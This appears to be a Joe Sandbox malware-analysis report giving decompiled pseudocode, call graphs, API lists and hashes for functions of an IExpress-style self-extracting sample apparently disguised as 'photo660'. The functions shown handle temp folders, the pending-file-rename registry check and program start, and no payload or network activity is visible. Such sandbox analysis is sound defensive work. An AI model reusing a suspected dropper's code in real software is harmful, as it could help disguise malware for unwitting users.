                                                                                                                                                                                                        0x00a94525
                                                                                                                                                                                                        0x00a9468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A945E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A9460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00A94630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,photo660,00000000), ref: 00A94666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00A9466F
                                                                                                                                                                                                          • Part of subcall function 00A9681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
                                                                                                                                                                                                          • Part of subcall function 00A9681F: GetSystemMetrics.USER32(0000004A), ref: 00A968A7
                                                                                                                                                                                                          • Part of subcall function 00A9681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
                                                                                                                                                                                                          • Part of subcall function 00A9681F: RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
                                                                                                                                                                                                          • Part of subcall function 00A9681F: RegCloseKey.ADVAPI32(?), ref: 00A96902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$photo660
                                                                                                                                                                                                        • API String ID: 3244514340-1652614573
                                                                                                                                                                                                        • Opcode ID: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                        • Instruction ID: c27248ad4f88c2f1bd6b22dc164baba6ac3f33d16f40067c2cc6b4cb95037dec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ab52fdcb78c6fd26376186aa6fdefc8b303e7811793601cc513009e7fda2785
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2151B276B00215ABDF219FA88D48BAA7BF9EF4A300F154196F949A7241DB319D06CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A953A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00A953A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xa98004; // 0x6298f871
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00A9171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00A91680(_t32, 0x104, _t20);
					E00A9658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00A96CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xa98a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                        0x00a953ac
                                                                                                                                                                                                        0x00a953b3
                                                                                                                                                                                                        0x00a953b9
                                                                                                                                                                                                        0x00a953bb
                                                                                                                                                                                                        0x00a953bd
                                                                                                                                                                                                        0x00a953bf
                                                                                                                                                                                                        0x00a953d1
                                                                                                                                                                                                        0x00a953d6
                                                                                                                                                                                                        0x00a953e0
                                                                                                                                                                                                        0x00a953e2
                                                                                                                                                                                                        0x00a953f5
                                                                                                                                                                                                        0x00a953fb
                                                                                                                                                                                                        0x00a95402
                                                                                                                                                                                                        0x00a9540b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95415
                                                                                                                                                                                                        0x00a95416
                                                                                                                                                                                                        0x00a95427
                                                                                                                                                                                                        0x00a9542a
                                                                                                                                                                                                        0x00a9542b
                                                                                                                                                                                                        0x00a95434
                                                                                                                                                                                                        0x00a95434
                                                                                                                                                                                                        0x00a9543a
                                                                                                                                                                                                        0x00a9544c
                                                                                                                                                                                                        0x00a9544c
                                                                                                                                                                                                        0x00a95452
                                                                                                                                                                                                        0x00a9545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9545e
                                                                                                                                                                                                        0x00a9545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A953FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A9542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A95452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-3862032828
                                                                                                                                                                                                        • Opcode ID: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                        • Instruction ID: 8635cb46836e4ae66b512fdc8b20d6126ee7a366eb4168103feabfbf0b5f4f57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f9fbdeb4d698ed051bc2a18fb6d6bdfb0156862a0561037a0cdb852bfd1e020
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB110171B0050467DB21EB769D4AFAF36AEEFD2311F000127B646D2190CE74898387A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A9256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 a9256d-a9257d 564 a92583-a92589 563->564 565 a92622-a92627 call a924e0 563->565 567 a925e8-a92607 RegOpenKeyExA 564->567 568 a9258b 564->568 572 a92629-a9262f 565->572 569 a92609-a92620 RegQueryInfoKeyA 567->569 570 a925e3-a925e6 567->570 568->572 573 a92591-a92595 568->573 574 a925d1-a925dd RegCloseKey 569->574 570->572 573->572 575 a9259b-a925ba RegOpenKeyExA 573->575 574->570 575->570 576 a925bc-a925cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00A9256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E00A924E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                        0x00a92572
                                                                                                                                                                                                        0x00a92573
                                                                                                                                                                                                        0x00a92575
                                                                                                                                                                                                        0x00a92578
                                                                                                                                                                                                        0x00a9257d
                                                                                                                                                                                                        0x00a92627
                                                                                                                                                                                                        0x00a92583
                                                                                                                                                                                                        0x00a92586
                                                                                                                                                                                                        0x00a92589
                                                                                                                                                                                                        0x00a925eb
                                                                                                                                                                                                        0x00a92607
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92609
                                                                                                                                                                                                        0x00a9261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9258b
                                                                                                                                                                                                        0x00a9258b
                                                                                                                                                                                                        0x00a9259e
                                                                                                                                                                                                        0x00a925b2
                                                                                                                                                                                                        0x00a925ba
                                                                                                                                                                                                        0x00a925cb
                                                                                                                                                                                                        0x00a925d1
                                                                                                                                                                                                        0x00a925d6
                                                                                                                                                                                                        0x00a925da
                                                                                                                                                                                                        0x00a925dd
                                                                                                                                                                                                        0x00a925dd
                                                                                                                                                                                                        0x00a925e3
                                                                                                                                                                                                        0x00a925e3
                                                                                                                                                                                                        0x00a925e3
                                                                                                                                                                                                        0x00a9258b
                                                                                                                                                                                                        0x00a92589
                                                                                                                                                                                                        0x00a9262f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A94096,00000000,00000000,00000000,00000000,?,00A91ED3,00000001,00000000), ref: 00A9261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00A925A8
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00A925C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A925F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                        • Instruction ID: 54a709df246bd31059a5b962e9fe98f772d57d76fb340c7e627776cedc40e960
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F114F35B42228BBAF20DB919C09EFBBEFCEF567A1F104056B909E2011DA345E45D7E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A96A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 577 a96a60-a96a91 call a97155 call a97208 GetStartupInfoW 583 a96a93-a96aa2 577->583 584 a96abc-a96abe 583->584 585 a96aa4-a96aa6 583->585 588 a96abf-a96ac5 584->588 586 a96aa8-a96aad 585->586 587 a96aaf-a96aba Sleep 585->587 586->588 587->583 589 a96ad1-a96ad7 588->589 590 a96ac7-a96acf _amsg_exit 588->590 592 a96ad9-a96ae9 call a96c3f 589->592 593 a96b05 589->593 591 a96b0b-a96b11 590->591 594 a96b2e-a96b30 591->594 595 a96b13-a96b24 _initterm 591->595 599 a96aee-a96af2 592->599 593->591 597 a96b3b-a96b42 594->597 598 a96b32-a96b39 594->598 595->594 600 a96b44-a96b51 call a97060 597->600 601 a96b67-a96b71 597->601 598->597 599->591 602 a96af4-a96b00 599->602 600->601 610 a96b53-a96b65 600->610 604 a96b74-a96b79 601->604 605 a96c39-a96c3e call a9724d 602->605 608 a96b7b-a96b7d 604->608 609 a96bc5-a96bc8 604->609 614 a96b7f-a96b81 608->614 615 a96b94-a96b98 608->615 612 a96bca-a96bd3 609->612 613 a96bd6-a96be3 _ismbblead 609->613 610->601 612->613 619 a96be9-a96bed 613->619 620 a96be5-a96be6 613->620 614->609 616 a96b83-a96b85 614->616 617 a96b9a-a96b9e 615->617 618 a96ba0-a96ba2 615->618 616->615 621 a96b87-a96b8a 616->621 622 a96ba3-a96bbc call a92bfb 617->622 618->622 619->604 624 a96c1e-a96c25 619->624 620->619 621->615 625 a96b8c-a96b92 621->625 622->624 630 a96bbe-a96bbf exit 622->630 626 a96c32 624->626 627 a96c27-a96c2d _cexit 624->627 625->616 626->605 627->626 630->609
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00A97155();
				_push(0x58);
				_push(0xa972b8);
				E00A97208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0xa988b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0xa988b0; // 0x2
						if(__eflags != 0) {
							 *0xa981e4 = _t58;
							goto L13;
						} else {
							 *0xa988b0 = _t58;
							_t37 = E00A96C3F(0xa910b8, 0xa910c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00A96FF4();
						L13:
						_t68 =  *0xa988b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0xa910b4);
							_push(0xa910ac);
							L00A97202();
							 *0xa988b0 = 2;
						}
						if(_t53 == 0) {
							 *0xa988ac = 0;
						}
						_t71 =  *0xa988b4;
						if( *0xa988b4 != 0 && E00A97060(_t71, 0xa988b4) != 0) {
							_t60 =  *0xa988b4; // 0x0
							 *0xa9a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00A92BFB(0xa90000, 0, _t59); // executed
							 *0xa981e0 = _t30;
							__eflags =  *0xa981f8;
							if( *0xa981f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0xa981e4;
							if( *0xa981e4 == 0) {
								__imp___cexit();
								_t30 =  *0xa981e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E00A9724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                        0x00a96a60
                                                                                                                                                                                                        0x00a96a6a
                                                                                                                                                                                                        0x00a96a6c
                                                                                                                                                                                                        0x00a96a71
                                                                                                                                                                                                        0x00a96a78
                                                                                                                                                                                                        0x00a96a7f
                                                                                                                                                                                                        0x00a96a85
                                                                                                                                                                                                        0x00a96a8e
                                                                                                                                                                                                        0x00a96a91
                                                                                                                                                                                                        0x00a96a93
                                                                                                                                                                                                        0x00a96a9c
                                                                                                                                                                                                        0x00a96aa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96aa6
                                                                                                                                                                                                        0x00a96ab4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96aa8
                                                                                                                                                                                                        0x00a96aaa
                                                                                                                                                                                                        0x00a96aab
                                                                                                                                                                                                        0x00a96aab
                                                                                                                                                                                                        0x00a96abf
                                                                                                                                                                                                        0x00a96abf
                                                                                                                                                                                                        0x00a96ac5
                                                                                                                                                                                                        0x00a96ad1
                                                                                                                                                                                                        0x00a96ad7
                                                                                                                                                                                                        0x00a96b05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96ad9
                                                                                                                                                                                                        0x00a96ad9
                                                                                                                                                                                                        0x00a96ae9
                                                                                                                                                                                                        0x00a96af0
                                                                                                                                                                                                        0x00a96af2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96af4
                                                                                                                                                                                                        0x00a96af4
                                                                                                                                                                                                        0x00a96afb
                                                                                                                                                                                                        0x00a96afb
                                                                                                                                                                                                        0x00a96af2
                                                                                                                                                                                                        0x00a96ac7
                                                                                                                                                                                                        0x00a96ac7
                                                                                                                                                                                                        0x00a96ac9
                                                                                                                                                                                                        0x00a96b0b
                                                                                                                                                                                                        0x00a96b0b
                                                                                                                                                                                                        0x00a96b11
                                                                                                                                                                                                        0x00a96b13
                                                                                                                                                                                                        0x00a96b18
                                                                                                                                                                                                        0x00a96b1d
                                                                                                                                                                                                        0x00a96b24
                                                                                                                                                                                                        0x00a96b24
                                                                                                                                                                                                        0x00a96b30
                                                                                                                                                                                                        0x00a96b39
                                                                                                                                                                                                        0x00a96b39
                                                                                                                                                                                                        0x00a96b3b
                                                                                                                                                                                                        0x00a96b42
                                                                                                                                                                                                        0x00a96b57
                                                                                                                                                                                                        0x00a96b5f
                                                                                                                                                                                                        0x00a96b65
                                                                                                                                                                                                        0x00a96b65
                                                                                                                                                                                                        0x00a96b67
                                                                                                                                                                                                        0x00a96b6c
                                                                                                                                                                                                        0x00a96b6e
                                                                                                                                                                                                        0x00a96b71
                                                                                                                                                                                                        0x00a96b74
                                                                                                                                                                                                        0x00a96b74
                                                                                                                                                                                                        0x00a96b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96b7d
                                                                                                                                                                                                        0x00a96b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96b83
                                                                                                                                                                                                        0x00a96b8c
                                                                                                                                                                                                        0x00a96b8d
                                                                                                                                                                                                        0x00a96b90
                                                                                                                                                                                                        0x00a96b90
                                                                                                                                                                                                        0x00a96b83
                                                                                                                                                                                                        0x00a96b81
                                                                                                                                                                                                        0x00a96b94
                                                                                                                                                                                                        0x00a96b98
                                                                                                                                                                                                        0x00a96ba2
                                                                                                                                                                                                        0x00a96b9a
                                                                                                                                                                                                        0x00a96b9a
                                                                                                                                                                                                        0x00a96b9a
                                                                                                                                                                                                        0x00a96ba3
                                                                                                                                                                                                        0x00a96bab
                                                                                                                                                                                                        0x00a96bb0
                                                                                                                                                                                                        0x00a96bb5
                                                                                                                                                                                                        0x00a96bbc
                                                                                                                                                                                                        0x00a96bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96bbf
                                                                                                                                                                                                        0x00a96c1e
                                                                                                                                                                                                        0x00a96c25
                                                                                                                                                                                                        0x00a96c27
                                                                                                                                                                                                        0x00a96c2d
                                                                                                                                                                                                        0x00a96c2d
                                                                                                                                                                                                        0x00a96c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96bc5
                                                                                                                                                                                                        0x00a96bc5
                                                                                                                                                                                                        0x00a96bc8
                                                                                                                                                                                                        0x00a96bcc
                                                                                                                                                                                                        0x00a96bce
                                                                                                                                                                                                        0x00a96bce
                                                                                                                                                                                                        0x00a96bd1
                                                                                                                                                                                                        0x00a96bd3
                                                                                                                                                                                                        0x00a96bd3
                                                                                                                                                                                                        0x00a96bd6
                                                                                                                                                                                                        0x00a96bda
                                                                                                                                                                                                        0x00a96be1
                                                                                                                                                                                                        0x00a96be3
                                                                                                                                                                                                        0x00a96be5
                                                                                                                                                                                                        0x00a96be5
                                                                                                                                                                                                        0x00a96be6
                                                                                                                                                                                                        0x00a96be6
                                                                                                                                                                                                        0x00a96be9
                                                                                                                                                                                                        0x00a96bea
                                                                                                                                                                                                        0x00a96bea
                                                                                                                                                                                                        0x00a96b74
                                                                                                                                                                                                        0x00a96c39
                                                                                                                                                                                                        0x00a96c3e
                                                                                                                                                                                                        0x00a96c3e
                                                                                                                                                                                                        0x00a96abe
                                                                                                                                                                                                        0x00a96abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetCurrentProcessId.KERNEL32 ref: 00A97191
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetCurrentThreadId.KERNEL32 ref: 00A9719A
                                                                                                                                                                                                          • Part of subcall function 00A97155: GetTickCount.KERNEL32 ref: 00A971A3
                                                                                                                                                                                                          • Part of subcall function 00A97155: QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00A972B8,00000058), ref: 00A96A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00A96AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00A96AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00A96B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00A96B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00A96BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00A96BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
